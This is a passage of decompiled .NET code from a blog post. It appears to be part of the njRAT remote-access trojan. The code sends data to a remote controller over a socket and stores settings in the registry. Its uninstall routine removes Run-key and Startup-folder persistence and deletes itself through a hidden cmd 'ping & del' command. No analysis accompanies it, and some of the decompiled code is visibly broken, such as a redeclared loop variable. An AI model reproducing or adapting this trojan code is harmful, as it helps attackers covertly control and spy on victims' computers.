return OK.Sendb(OK.SB(ref S));
}
public static bool Sendb(byte[] b)
{
if (!OK.Cn)
{
return false;
}
try
{
FileInfo lO = OK.LO;
lock (lO)
{
if (!OK.Cn)
{
return false;
}
MemoryStream memoryStream = new MemoryStream();
string text = b.Length.ToString() + "\0";
byte[] array = OK.SB(ref text);
memoryStream.Write(array, 0, array.Length);
memoryStream.Write(b, 0, b.Length);
OK.C.Client.Send(memoryStream.ToArray(), 0, checked((int)memoryStream.Length), SocketFlags.None);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
try
{
if (OK.Cn)
{
OK.Cn = false;
OK.C.Close();
}
}
catch (Exception ex4)
{
ProjectData.SetProjectError(ex4);
Exception ex5 = ex4;
ProjectData.SetProjectError(ex5);
Exception ex6 = ex5;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
return OK.Cn;
}
public static bool STV(string n, object t, RegistryValueKind typ)
{
bool result;
try
{
OK.F.Registry.CurrentUser.CreateSubKey("Software\\" + OK.RG).SetValue(n, RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(t)), typ);
result = true;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
result = false;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
return result;
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public static void UNS()
{
string programFiles = MyProject.Computer.FileSystem.SpecialDirectories.ProgramFiles;
string[] logicalDrives = Directory.GetLogicalDrives();
string[] array = logicalDrives;
foreach (string programFiles in array)
{
try
{
if (File.Exists(programFiles + OK.RG))
{
File.Delete(programFiles + OK.RG);
}
}
catch (Exception projectError)
{
ProjectData.SetProjectError(projectError);
ProjectData.ClearProjectError();
}
}
OK.pr(0);
OK.Isu = false;
try
{
OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).DeleteValue(OK.RG, false);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
try
{
OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).DeleteValue(OK.RG, false);
}
catch (Exception ex4)
{
ProjectData.SetProjectError(ex4);
Exception ex5 = ex4;
ProjectData.SetProjectError(ex5);
Exception ex6 = ex5;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
try
{
if (OK.HIDE_ME)
{
File.SetAttributes(Interaction.Environ(OK.DR) + "\\" + OK.EXE, FileAttributes.Normal);
}
string fileNameWithoutExtension = Path.GetFileNameWithoutExtension(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG);
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + fileNameWithoutExtension + ".url");
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG);
}
catch (Exception ex7)
{
ProjectData.SetProjectError(ex7);
Exception ex8 = ex7;
ProjectData.SetProjectError(ex8);
Exception ex9 = ex8;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
try
{
OK.F.Registry.CurrentUser.OpenSubKey("Software", true).DeleteSubKey(OK.RG, false);
}
catch (Exception ex10)
{
ProjectData.SetProjectError(ex10);
Exception ex11 = ex10;
ProjectData.SetProjectError(ex11);
Exception ex12 = ex11;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
try
{
Interaction.Shell("cmd.exe /c ping 0 -n 2 & del \"" + OK.LO.FullName + "\"", AppWinStyle.Hide, false, -1);
}
catch (Exception ex13)
{
ProjectData.SetProjectError(ex13);
Exception ex14 = ex13;
ProjectData.SetProjectError(ex14);
Exception ex15 = ex14;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
ProjectData.EndApp();
}
public static byte[] ZIP(byte[] B)
{
MemoryStream memoryStream = new MemoryStream(B);
GZipStream gZipStream = new GZipStream(memoryStream, CompressionMode.Decompress);
byte[] array = new byte[4];
checked
{
memoryStream.Position = memoryStream.Length - 5;
memoryStream.Read(array, 0, 4);
int num = BitConverter.ToInt32(array, 0);
memoryStream.Position = 0L;
byte[] array2 = new byte[num - 1 + 1 - 1 + 1];
gZipStream.Read(array2, 0, num);
gZipStream.Dispose();
memoryStream.Dispose();
return array2;
}
}
}
No comments:
Post a Comment